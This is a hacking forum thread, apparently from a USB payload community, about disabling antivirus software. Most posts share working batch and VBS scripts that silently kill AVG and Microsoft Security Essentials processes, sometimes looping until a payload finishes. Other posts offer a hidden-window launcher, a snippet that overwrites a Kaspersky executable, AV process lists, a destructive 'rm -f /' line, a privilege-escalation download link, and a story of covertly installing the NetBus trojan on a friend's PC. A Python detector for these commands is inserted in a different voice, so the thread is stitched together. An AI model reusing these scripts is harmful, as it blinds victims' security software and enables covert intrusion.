ElevenWarrior Posted January 2, 2009
@(X3N) hey, can you tell me the name of the exploit that can kill the AVs?
dennis123123 Posted January 2, 2009
Any good AV app, like ESET and the others that have been mentioned, will auto-restart or produce alerts if they try to be killed. Notice how ekrn.exe and egui.exe are not in the metasploit list? That's because when killed, they immediately restart. Well, ekrn does anyway; egui is just the frontend, and even if you do lose that, the warnings still appear. But still, a better solution than simply process killing would be great :)
X3N Posted January 5, 2009
> @(X3N) hey, can you tell me the name of the exploit that can kill the AVs?

It's not an exploit, just part of a ruby script that can run on the meterpreter....
nvralone Posted January 9, 2009
** Random Thought **
What about a method that involves forcing the process to shut down, but when it restarts it is forced to restart in a sandboxed environment, rendering it useless to the system? As for the pop-up messages, what about a monitor refresh triggered by the pop-up? This would blank the screen for a moment, giving the pop-up time to fade. Although the screen blanking out would be an indicator, many users would just think it was a minor glitch.
*Extremely Crude*
Alternatively, use an AutoIt script to hide the cursor, take a screenshot, hide the taskbar and replace the background with the screenshot, and switch back to the original settings after the payload runs. I'll begin the research to see if this is possible but wanted to get some thoughts on this.
Scorpion Posted January 9, 2009
How about having it pause the process? This way you haven't ended the task, so no restarts and no warnings.
TcKh4cker Posted April 28, 2009
Hey, did you guys think of cleaning the whole .exe program with VBA, VB or VBS? You can let your program check if the path exists and then open the .exe and let it type something like "lol you just got hacked". Then on next startup delete registry values and make a virus downloader. The code looks like this:

MyFile = "C:\Program files\kaspersky 2009" & "kaspersky.exe"
fnum = FreeFile()
Open MyFile For Output As fnum
Print #fnum, "this doesn't work anymore"
Close #fnum

And before this code you could run a check to see if the path exists. Now I am going back to gaming, bye bye
messsy Posted April 28, 2009
I was thinking, if the file was edited in the correct procedure there would be minimal work to undetect these before compiling, i.e. the resulting exe will either need crypting or hexing. If one person kept up-to-date undetected files on a server then that might prove useful. If the file was crypted then all firewalls and AV will not flag them; if a half-decent crypter was used it could just run in the RAM memory. HMMM, what do you think?
gloryforixseal Posted June 15, 2009
Yes, it works. chainloader has two forms: ramdisk and mapping. The mapping method has no size limitation, but requires the image file to be contiguous. That's why contig.exe is required; it's the simplest way of making a single file contiguous.
h2oh4x! Posted July 27, 2009
> Hey, did you guys think of cleaning the whole .exe program with VBA, VB or VBS? You can let your program check if the path exists and then open the .exe and let it type something like "lol you just got hacked". Then on next startup delete registry values and make a virus downloader. The code looks like this:
>
> MyFile = "C:\Program files\kaspersky 2009" & "kaspersky.exe"
> fnum = FreeFile()
> Open MyFile For Output As fnum
> Print #fnum, "this doesn't work anymore"
> Close #fnum
>
> And before this code you could run a check to see if the path exists. Now I am going back to gaming, bye bye

Lol, how's that gonna work when kaspersky.exe is already running? By the way guys, maybe look into ZwTerminateProcess? It should be able to close any process whenever you want :)
X3N Posted July 28, 2009
I got a good one... just do this...

#!/bin/bash
rm -f /
Netshroud Posted July 28, 2009
MsMpEng.exe
msseces.exe
(for Microsoft Security Essentials)
hA1d3R Posted August 6, 2009
Protected processes can't be paused/suspended.
h2oh4x! Posted August 6, 2009
> Protected processes can't be paused/suspended.

Yes they can, if you have admin privileges.
Boaz Tirosh Posted August 18, 2009
Hi to all, I'm new to this community, as you can probably guess from the amount of posts I have made.. :) and English is not my strongest side, so you'll have to excuse my grammar and spelling... I had a problem similar to what you guys describe, and my solution was some kind of social engineering. I was trying to load an old trojan (NetBus.. don't ask, I'm not that lame, it was a bet..) on a friend's PC, but the bu%#$d had Kaspersky running, and I couldn't find any way to turn it off, so I did the exact opposite: I made a batch file that made the security so tight my friend couldn't work. In the same batch file I added several if statements that checked if Kaspersky was running, and when it found out it wasn't, a second file I had inserted into his boot downloaded and executed NetBus and notified me... What happened was that, like I hoped, my friend got frustrated with Kaspersky so he uninstalled it. The DOS commands for doing this trick actually came from the Kaspersky forums, and of course I knew in advance that he uses Kaspersky.. Anyway, just another idea..
corcrash Posted August 18, 2009
I thought that you could somehow patch the AV like any other program, and make the patch start before the AV (probably get it RING 0 privileges), so ASM would be the right choice. But there is a problem I know with NOD32: if any program tries to change it, it detects the change and asks if you want to allow it. I don't know about other AVs, and neither do I know if it would check its own code if you change it before the start, but it might work.
l4rrydav1d Posted November 7, 2009
Ok guys, we all know that the AVKill (csrss.exe) we use for our switchblades is outdated and flagged by every AV known. So I wanted to come up with an alternative method of killing AVs before launching our switchblades. If this works out, I think it would be a great addition to Leapo's Pocket Knife. What I decided to try was using Nircmd's processkill command to eliminate the AV processes. I was concerned that the AV would recognize the attempt and block it, or alert. For AVs such as Avast, we would want to make sure we mute the system speakers. (Note: we would want to do that anyway, because if Avast flags a virus it screams "A VIRUS HAS BEEN DETECTED".) Anyway, if a certain AV alerts to the attempt to kill its process, what is the difference, because it is going to alert to running csrss.exe and some of our other tools. So long as it isn't audible, we still have time to get in and out without immediate detection. I tested this on AVG and it worked flawlessly and silently.

::Abigwar's First Attempt at Batch AVkiller
::Mute the system volume, in case of audible AV Alerts (Avast!)
nircmd mutesysvolume 1
::Kill AVG Command Center
nircmd killprocess avgcc.exe
::Kill other AVG Processes
nircmd killprocess avgemc.exe
nircmd killprocess avgupsvc.exe
nircmd killprocess avgamsvr.exe
::Restore system volume at end of switchblade
nircmd mutesysvolume 0

Now what I would like to ask from all of you is to look at your system processes and let's make a list of the processes each virus scanner uses. When we have them all listed, we can then script it into the batch to kill all the applicable processes. We also need to see how each AV reacts to the attempt to kill its processes. One other thing I was considering: if an AV's process is persistent, we could loop the batch file to continue to run, and kill the process over and over. How that could work is we would call the separate Anti-AV batch file from the start.bat or go.bat, and let it loop until the switchblade ends. So at the end of the switchblade we would create a text file on the thumbdrive. The loop would stop when it sees the file, then delete it to make it ready for next time and end.

::Theoretical Loop batch
:Start
nircmd killprocess avgcc.exe
nircmd killprocess avgemc.exe
nircmd killprocess avgupsvc.exe
nircmd killprocess avgamsvr.exe
IF EXIST SWITCHDONE.TXT GOTO END
GOTO START
:END
delete switchdone.txt

A pretty detailed list of AV processes can be found here: http://dev.metasploit.com/redmine/projects...reter/killav.rb
catchyanow Posted November 7, 2009
I find that the easiest way to kill anti-virus software etc. is to go to the program's main controls and shut it down from there. Too easy :D
rawkus1020 Posted July 23, 2010
It took me hours, but I've finally got Microsoft Security Essentials to disable itself. Now the only issue I have is on Windows 7 Ultimate 64-bit: when the antivirus shuts off, the Action Center displays a message saying "turn on Microsoft Security Essentials". I take it I need some code before this to disable Action Center from displaying messages. Should I look at a reg setting or a group policy setting? I tried net stop wscsvc (Security Center service) but it displays that it has turned itself off. Please help. I got 2 bat files and a vbs file (as this is the only way I could find to run cmd prompt invisible; is there a better way to do this?). Here is the code I got so far:

launch.bat
wscript.exe "invis.vbs" "MS Security Essentials off.bat"

invis.vbs
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

MS Security Essentials off.bat
Echo off
net stop MsMpSvc
process.exe -k MsMpEng.exe
process.exe -k msseces.exe

The process.exe is an app called Command Line Process Viewer/Killer/Suspender; it is the only way I found successful to kill MSE .exe's. You can download it HERE and here's how to use the switches: Link. Any suggestions to tidy up my code would be great.
rod
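A defender-side counterpart to the kill scripts in this thread, added here as an example and not code posted by anyone in it: it scans constructed Sysmon-style process-creation log lines for the command-line shapes used above (nircmd killprocess, process.exe -k, taskkill /IM, net stop) aimed at the AV processes and services named in the thread, and returns the hits. The log line format and the sample lines are assumptions constructed for the example.

```python
import re

# Process and service names of the AV products mentioned in this thread.
AV_PROCESSES = {"ekrn.exe", "egui.exe",                                    # ESET
                "avgcc.exe", "avgemc.exe", "avgupsvc.exe", "avgamsvr.exe",  # AVG
                "msmpeng.exe", "msseces.exe"}                              # MSE
AV_SERVICES = {"msmpsvc", "wscsvc"}  # MSE service, Windows Security Center

# Command-line shapes used in the thread to kill a process or stop a service; group 1 is the target.
KILL_PATTERNS = [
    re.compile(r"\bnircmd(?:\.exe)?\s+killprocess\s+(\S+)", re.I),
    re.compile(r"\bprocess(?:\.exe)?\s+-k\s+(\S+)", re.I),
    re.compile(r"\btaskkill(?:\.exe)?\b.*?/im\s+(\S+)", re.I),
]
STOP_PATTERN = re.compile(r"\bnet(?:\.exe)?\s+stop\s+(\S+)", re.I)

def _target(pattern, cmdline):
    m = pattern.search(cmdline)
    return m.group(1).strip('"').lower() if m else None

def classify(cmdline):
    """Return (kind, target) if the command line kills an AV process or stops
    an AV service, else None. Names are compared case-insensitively."""
    for pat in KILL_PATTERNS:
        target = _target(pat, cmdline)
        if target in AV_PROCESSES:
            return ("kill_av_process", target)
    target = _target(STOP_PATTERN, cmdline)
    if target in AV_SERVICES:
        return ("stop_av_service", target)
    return None

def scan_log(lines):
    """Constructed log format (assumed): '<time> <user> CommandLine=<command line>'."""
    hits = []
    for line in lines:
        verdict = classify(line.partition("CommandLine=")[2])
        if verdict:
            hits.append((line.split()[0],) + verdict)
    return hits

# Constructed sample lines modelled on the scripts posted in this thread.
SAMPLE_LOG = [
    "10:01:02 DESKTOP\\rod CommandLine=net stop MsMpSvc",
    "10:01:03 DESKTOP\\rod CommandLine=process.exe -k MsMpEng.exe",
    "10:02:10 DESKTOP\\rod CommandLine=nircmd mutesysvolume 1",
    "10:02:11 DESKTOP\\rod CommandLine=nircmd killprocess avgcc.exe",
    "10:05:00 DESKTOP\\rod CommandLine=taskkill /F /IM explorer.exe",
]
```

Running scan_log(SAMPLE_LOG) flags the net stop, process.exe -k and nircmd killprocess lines and ignores the volume mute and the taskkill of a non-AV process.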
eovnu87435ds Posted October 27, 2010
If it helps, here are some scripts I found a while ago to easily escalate Windows privileges (at least in XP, as far as I have tested). I used it to allow my (under)privileged account at school to run a batch file that installed Portal on one of the AutoCAD boxes in school :D It consists of 3 scripts to elevate the current process to one run as Admin or even PowerUser (Windows equivalent of root). I don't know if it'll be of any use, but here it is anyways. http://www.filedude.com/download/RVSJ3rYkIR3c55e742fe
Side Note: Why can't we upload zip files via the forum attachments?
bytesabit Posted November 6, 2010
> It's not an exploit, just part of a ruby script that can run on the meterpreter....

Yummy....Mmmmm... Meterpreter *rubs belly*